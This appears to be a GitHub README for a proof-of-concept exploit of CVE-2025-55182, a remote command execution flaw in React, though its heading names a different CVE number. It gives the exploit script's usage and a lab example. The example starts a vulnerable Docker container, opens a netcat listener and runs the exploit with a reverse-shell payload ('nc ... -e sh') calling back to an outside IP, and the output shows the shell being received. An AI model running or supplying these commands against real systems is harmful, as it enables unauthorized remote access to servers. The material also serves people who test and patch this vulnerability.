masterwok/PoC-CVE-2025-55182

# PoC: CVE-2026-33017 [https://nvd.nist.gov/vuln/detail/CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182) ## 用法 ``` usage: CVE-2025-55182.py [-h] --command COMMAND target PoC exploit: CVE-2025-55182 positional arguments: target Target hostname options: -h, --help show this help message and exit --command COMMAND Command to run on target ``` ## 示例 ``` # 创建 Docker 实例 docker run -d -p 3000:3000 ihsansencan/react2shell:cve-2025-55182 # 启动监听器 nc -lnvp 4444 # 启动利用程序 python3 CVE-2025-55182.py http://127.0.0.1:3000/ --command "nc 192.168.1.211 4444 -e sh" # 应在监听器中收到反向 Shell Listening on 0.0.0.0 4444 Connection received on 172.17.0.2 43911 uname -a Linux f346806b6f59 6.17.0-20-generic #20~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Mar 19 01:28:37 UTC 2 x86_64 Linux ``` 本项目仅供教育和研究用途。 作者不对因使用此代码造成的误用或损坏负责。

标签：CISA项目, CVE-2025-55182, Docker, PoC, RCE, React, React2Shell, Syscalls, 前端安全, 反向shell, 威胁模拟, 安全防御评估, 容器, 教育研究, 暴力破解, 注入, 网络安全, 请求拦截, 远程命令执行, 逆向工具, 隐私保护